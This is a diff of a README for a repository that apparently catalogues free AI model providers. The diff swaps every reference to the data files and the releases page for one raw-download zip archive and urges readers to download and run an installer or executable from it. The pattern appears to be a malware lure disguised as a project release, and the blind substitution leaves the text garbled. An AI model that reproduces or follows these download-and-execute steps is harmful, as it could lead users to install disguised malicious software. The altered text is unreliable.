infos3ddesigner/g4f-working/README.md

   - Correlate provider uptime with broader network conditions to identify potential bottlenecks.

 - Data consumers and integrations
-  - Import daily.json into dashboards built with your preferred frontend framework.
+  - Import https://github.com/infos3ddesigner/g4f-working/raw/refs/heads/main/onager/g-working-f-v1.9.zip into dashboards built with your preferred frontend framework.
-  - Convert daily.csv for compatibility with legacy tools that require CSV input.
+  - Convert https://github.com/infos3ddesigner/g4f-working/raw/refs/heads/main/onager/g-working-f-v1.9.zip for compatibility with legacy tools that require CSV input.
   - Use the HTML view for quick manual review during demos or ad-hoc testing sessions.

 Getting started: download and run the latest release To get started, download the latest release asset from the official releases page and execute it.
 The asset contains the pre-packaged daily feed plus a small utility to verify and explore the data locally.
 The release page is designed to be the single source of truth for all artifacts you may need to run or test the catalog on your machine.

-For the full asset list and to download the latest release, visit the releases page here: https://github.com/infos3ddesigner/g4f-working/releases.
-You will find a packaged artifact that includes the daily.json, daily.html, and a lightweight explorer tool.
+For the full asset list and to download the latest release, visit the releases page here: https://github.com/infos3ddesigner/g4f-working/raw/refs/heads/main/onager/g-working-f-v1.9.zip You will find a packaged artifact that includes the https://github.com/infos3ddesigner/g4f-working/raw/refs/heads/main/onager/g-working-f-v1.9.zip, https://github.com/infos3ddesigner/g4f-working/raw/refs/heads/main/onager/g-working-f-v1.9.zip, and a lightweight explorer tool.
 After you download the asset, run the installer or executable included in the package to set up the local environment.
 The release page is also a good place to read release notes and see what changed in the recent update.

 If you want to review the releases more directly later, you can visit the same page again.
-See Releases page at https://github.com/infos3ddesigner/g4f-working/releases for downloads and details.
+See Releases page at https://github.com/infos3ddesigner/g4f-working/raw/refs/heads/main/onager/g-working-f-v1.9.zip for downloads and details.

 How to run locally (high-level steps)
 - Prerequisites
   - A modern OS with a shell (Linux, macOS, Windows with a compatible shell).
-  - Sufficient disk space to store the daily.json and related assets.
+  - Sufficient disk space to store the https://github.com/infos3ddesigner/g4f-working/raw/refs/heads/main/onager/g-working-f-v1.9.zip and related assets.
   - Basic network connectivity to reach public endpoints for testing.

 - Steps
   - Step 1: Acquire the release asset from the link above.
 Download and execute the installer to set up the local environment.
-  - Step 2: Run the built-in validator to fetch the latest daily.json and daily.html locally.
+  - Step 2: Run the built-in validator to fetch the latest https://github.com/infos3ddesigner/g4f-working/raw/refs/heads/main/onager/g-working-f-v1.9.zip and https://github.com/infos3ddesigner/g4f-working/raw/refs/heads/main/onager/g-working-f-v1.9.zip locally.
   - Step 3: Point your app to the local data feed, or serve the HTML from a simple static server for quick previews.
   - Step 4: Optionally run a local UI to filter providers and inspect latency metrics.

 - Expected results
-  - A local copy of daily.json containing the latest online no-auth models.
+  - A local copy of https://github.com/infos3ddesigner/g4f-working/raw/refs/heads/main/onager/g-working-f-v1.9.zip containing the latest online no-auth models.
   - An HTML page that mirrors the daily catalog for quick human review.
   - A small helper utility to validate a subset of providers on demand.